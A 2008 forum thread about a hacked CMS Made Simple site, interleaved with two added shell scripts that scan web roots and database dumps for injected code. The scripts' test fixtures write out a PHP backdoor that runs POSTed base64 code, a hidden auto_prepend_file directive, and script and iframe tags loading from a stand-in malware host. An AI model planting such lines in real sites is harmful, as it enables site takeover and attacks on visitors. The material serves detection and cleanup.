HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:09 pm
by factor1
So I have a client on IX Web Hosting that got hacked. The hacker didn't remove anything, but added his hack to the top of all pages.
I can't seem to remove it at all. It's on all pages. I re-uploaded all the newest CMS files and ran the upgrade. I still can't remove it. It's on the front end and in the admin panel.
Any ideas?
http://www.hereshope.org/index.php
IX doesn't seem too helpful in any of this. I plan on moving this client off IX and onto my server; I just fear this is in the MySQL database or something.
Thanks.
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:25 pm
by factor1
So somehow, the hacker is injecting code above the CMS-generated HTML/PHP.
It's above all the normal doctype info.
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:32 pm
by snafu
Yeah, and I'm not sure if it's a coincidence or not, but your admin login popped some errors that referenced the calendar module... which may be related!?
http://www.hereshope.org/modules/Calend ... module.php
Were those errors there before?
Looks like the site is down to fix, good luck!
EDIT
Oh, and it looks like H-Sphere hosting, which I have, and I can access some H-Sphere gurus if you really think that's part of the problem!
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:34 pm
by factor1
Yeah, those errors were there before. It's an IX Web issue.
Yes, I added in a new index.html file for now.
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:35 pm
by Nullig
What version were you using when you were hacked?
It looks like the global metadata field has been changed. If it was in the db, you'd be able to see it in the Site Admin/Global Settings.
I bet someone has compromised a root access account on the server. Do you know if other sites on the host have been hacked?
Nullig
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:45 pm
by factor1
All 3 sites on this IX account were added to with some added PHP files. I removed them.
I did look at the global settings, nothing.
It was running an older version, 1.0 CMS. I have them on 1.2.3 now; the upgrade went well. But I can't seem to remove their addition.
I really dislike IX. This is not the first time this client's account has been hacked. A year ago someone got in and erased the index.php file and put up their own deal. I replaced the file, and all was fine again. This hack seems much worse.
IX claimed they got in from a weak FTP password. I don't know how a 10-character user and a 22-character password (both with uppers, lowers & numbers) are weak.
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 8:51 pm
by snafu
You might not have the necessary rights to delete the files... ask the host, or try running File Ownership from the H-Sphere control panel to gain file ownership, then try deleting again.
GOOD LUCK!!
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 10:23 pm
by factor1
So I deleted all the CMS files and re-uploaded.
Still there.
Any thoughts?
I did do a MySQL phpMyAdmin search of all tables for some of the content shown, and nothing was found.
Re: HACKED. Can't find files to be removed
Posted: Fri May 02, 2008 11:19 pm
by Nullig
.htaccess file?
Files in other directories?
Nullig
Re: HACKED. Can't find files to be removed - case closed
Posted: Fri May 02, 2008 11:22 pm
by factor1
Found it.
Looks like there were some scripts hiding in the root. The attack probably came in via a hole in Apache. There were files hidden everywhere.
I think I found it in the modules, and it somehow was generating its own modules call. I didn't see it the first time I replaced modules, since I was replacing the modules folder by folder.
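The hunt Nullig's post points at (.htaccess, files in other directories) and the hidden scripts factor1 eventually found in the root and under modules can be done systematically rather than folder by folder. The script below is an added example, not code from this thread or from CMS Made Simple: it flags PHP prepend/append directives in .htaccess, php.ini and .user.ini, PHP files using the usual obfuscation primitives, dot-files with a PHP extension, and then diffs the live deployment against a pristine extract of the same CMS version so that every file the attacker added or touched is listed. Every path and file body in it is constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the thread or from CMS Made Simple.
# Triage a shared-hosting web root for the kind of injection described above:
# code that appears above the CMS output on every page is usually either a
# file PHP is told to prepend to every request (.htaccess / php.ini /
# .user.ini directives) or a hook dropped into an existing module.
# All paths and file contents below are constructed for illustration.

# scan_webroot DIR
# Prints one line per file worth opening by hand, prefixed with why:
#   htaccess: config that prepends/appends a file or maps new extensions to PHP
#   payload:  PHP using the usual obfuscation primitives
#   hidden:   dot-files with a PHP extension (CMS code is never stored that way)
scan_webroot() {
    webroot=$1
    find "$webroot" -type f \( -name .htaccess -o -name php.ini -o -name .user.ini \) \
        -exec grep -l -i -E 'auto_(pre|ap)pend_file|AddHandler|AddType.*php' {} \; 2>/dev/null \
        | sed 's/^/htaccess: /'
    find "$webroot" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.inc' \) \
        -exec grep -l -E '(eval|assert|base64_decode|gzinflate|gzuncompress|str_rot13) *\(' {} \; 2>/dev/null \
        | sed 's/^/payload: /'
    find "$webroot" -type f -name '.*' \( -name '*.php' -o -name '*.phtml' \) 2>/dev/null \
        | sed 's/^/hidden: /'
}

# diff_against_clean CLEAN_DIR LIVE_DIR
# Lists files in LIVE_DIR that are absent from a pristine CMS extract of the
# same version, or that differ from it. Re-uploading the CMS over a
# compromised tree overwrites the known files but leaves attacker-added ones
# in place; this shows exactly which those are. Modification times are not
# used because an attacker can reset them with touch.
diff_against_clean() {
    clean_dir=$1
    live_dir=$2
    ( cd "$live_dir" && find . -type f | sort ) | while read -r f; do
        if [ ! -f "$clean_dir/$f" ]; then
            echo "extra: $f"
        elif ! cmp -s "$clean_dir/$f" "$live_dir/$f"; then
            echo "modified: $f"
        fi
    done
}

# build_sample ROOT
# Constructed fixture: a pristine copy under ROOT/clean and a compromised
# deployment under ROOT/live.
build_sample() {
    r=$1
    mkdir -p "$r/clean/modules/News" "$r/live/modules/News" "$r/live/uploads/images"
    printf '<?php echo "site"; ?>\n' > "$r/clean/index.php"
    printf '<?php class News {} ?>\n' > "$r/clean/modules/News/News.module.php"
    cp "$r/clean/index.php" "$r/live/index.php"
    cp "$r/clean/modules/News/News.module.php" "$r/live/modules/News/News.module.php"
    # attacker additions (constructed): a prepend directive, a hidden backdoor,
    # a hook appended to a legitimate module, and a PHP file in an upload dir
    printf 'php_value auto_prepend_file /home/site/.cache/x.php\n' > "$r/live/.htaccess"
    printf '<?php eval(base64_decode($_POST["c"])); ?>\n' > "$r/live/modules/News/.lib.php"
    printf '<?php include __DIR__ . "/.lib.php"; ?>\n' >> "$r/live/modules/News/News.module.php"
    printf '<?php $d = gzinflate(base64_decode("eJw")); ?>\n' > "$r/live/uploads/images/logo.php"
}

demo() {
    root=$(mktemp -d)
    build_sample "$root"
    echo "== suspicious files in $root/live"
    scan_webroot "$root/live"
    echo "== files that differ from the clean copy"
    diff_against_clean "$root/clean" "$root/live"
    rm -rf "$root"
}
demo
```

Run it against the real web root with `scan_webroot /path/to/htdocs` and `diff_against_clean /path/to/pristine-cmsms-1.2.x /path/to/htdocs`; the pattern lists are a starting point, not a complete signature set. Two caveats a tenant on shared hosting cannot check from the account itself: an `auto_prepend_file` can also be set in the server-level php.ini or vhost config, and a planted file outside the web root (the `.cache` path in the fixture) is still served if a directive points at it, so ask the host to look there too.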
Re: HACKED. Can't find files to be removed
Posted: Tue May 06, 2008 12:40 pm
by Pierre M.
Hello,
I think, when cracked, the question is not "can't find files to be removed". The most important thing is to wipe out everything (folders and database), make a clean install from scratch, and restore a clean DB backup. Any other procedure is prone to missing some hidden poison file somewhere.
BTW, latest official stable is 1.2.4 (not 1.2.3).
Pierre M.
Re: HACKED. Can't find files to be removed
Posted: Wed May 14, 2008 10:18 pm
by factor1
So should I not move the DB tables either? I wasn't planning on moving any CMS files off that server.
Any suggestions on how to clean the DB? I assume comb through each page and copy and paste out for a fresh install?
Re: HACKED. Can't find files to be removed
Posted: Wed May 14, 2008 10:42 pm
by snafu
I think Pierre's suggestion "to make a clean install from scratch and to restore a db clean backup" is probably the best/right answer.
Your question seems to imply there might not be a clean DB backup to restore?
The ideal would be to have many days/weeks of DB backups and to 'roll back' to a clean backup of files and databases, as available.
Here's an interesting read for backing up files and databases,
A small guide to CMSMS Backup.
I know this may not help you now, but hopefully you and others in the future
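factor1's phpMyAdmin search for the visible part of the injection found nothing, and the later question is how to clean the database; snafu's answer is to roll back to a clean backup. The following is an added example, not code from this thread, from CMS Made Simple or from the backup guide linked above: it scans a mysqldump file for markup that has no place in stored content, templates or site preferences (including the encoded forms a search for the visible text would miss), and uses that check to pick the newest backup that still passes, so the clean reinstall Pierre describes starts from a database you have actually inspected. The table names follow the cms_ prefix; the dump files, their dates and every row in them are constructed fixtures.

```shell
#!/bin/sh
# Added example, not code from the thread or from CMS Made Simple.
# Search a mysqldump for markup that does not belong in stored page
# content, templates or site preferences, and use that check to pick the
# newest backup that is still clean before restoring it. Table names use the
# cms_ prefix; every dump below is a constructed fixture, not a real site.

# Patterns for injected markup; the line is lowercased before matching.
# Plain-text searches in phpMyAdmin for the visible part of an injection will
# not catch the encoded forms, so those are listed too.
INJECT_RE='<script[ >]|<iframe|document[.]write|string[.]fromcharcode|unescape[(]|eval[(]|base64_decode'

# scan_dump FILE
# Prints "TABLE line N: MATCH" for each INSERT row that matches INJECT_RE.
# Returns 0 if the dump is clean, 1 if anything matched. Dump with
# --skip-extended-insert so that each row is on its own line.
scan_dump() {
    awk -v re="$INJECT_RE" '
        /^INSERT INTO `/ {
            tbl = $3
            gsub(/`/, "", tbl)
            if (match(tolower($0), re)) {
                hits++
                printf "%s line %d: %s\n", tbl, NR, substr($0, RSTART, RLENGTH)
            }
        }
        END { if (hits) exit 1; exit 0 }
    ' "$1"
}

# first_clean_backup DIR
# Walks DIR/*.sql newest-first (names carry an ISO date, so lexical order is
# chronological; assumes no whitespace in names) and prints the first dump
# that scan_dump passes. Returns 1 if every backup is already infected.
first_clean_backup() {
    for f in $(ls "$1"/*.sql | sort -r); do
        if scan_dump "$f" >/dev/null; then
            echo "$f"
            return 0
        fi
    done
    return 1
}

# build_sample_backups DIR
# Constructed fixture: three dated dumps, the oldest clean and the later
# two carrying progressively more injected content.
build_sample_backups() {
    cat > "$1/site-2008-04-20.sql" <<'EOF'
-- constructed sample, not a real dump
INSERT INTO `cms_siteprefs` VALUES ('metadata','<meta name="generator" content="CMS Made Simple" />');
INSERT INTO `cms_content_props` VALUES (1,'content_en','<p>Welcome</p>');
INSERT INTO `cms_templates` VALUES (1,'Default','<!DOCTYPE html>{content}');
EOF
    cat > "$1/site-2008-04-28.sql" <<'EOF'
-- constructed sample, not a real dump
INSERT INTO `cms_siteprefs` VALUES ('metadata','<meta name="generator" content="CMS Made Simple" />');
INSERT INTO `cms_content_props` VALUES (1,'content_en','<p>Welcome</p>');
INSERT INTO `cms_templates` VALUES (1,'Default','<!DOCTYPE html><SCRIPT src="http://malware.example/x.js"></SCRIPT>{content}');
EOF
    cat > "$1/site-2008-05-01.sql" <<'EOF'
-- constructed sample, not a real dump
INSERT INTO `cms_siteprefs` VALUES ('metadata','<iframe src="http://malware.example/" width="0" height="0"></iframe>');
INSERT INTO `cms_content_props` VALUES (1,'content_en','<p>Welcome</p><?php eval(base64_decode("ZWNobyAxOw==")); ?>');
INSERT INTO `cms_templates` VALUES (1,'Default','<!DOCTYPE html><script src="http://malware.example/x.js"></script>{content}');
EOF
}

demo() {
    dir=$(mktemp -d)
    build_sample_backups "$dir"
    for f in "$dir"/*.sql; do
        echo "== $f"
        scan_dump "$f" || echo "   (infected, do not restore)"
    done
    echo "== newest clean backup: $(first_clean_backup "$dir" || echo none)"
    rm -rf "$dir"
}
demo
```

The table and line number in each hit tell you which row to look at in phpMyAdmin if you decide to hand-clean a backup instead of discarding it. A dump that passes this scan is not proven clean, only free of the listed patterns; it is a gate before the restore, not a substitute for it, and it says nothing about added admin accounts, which need a separate look at the users table against the accounts you know you created.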
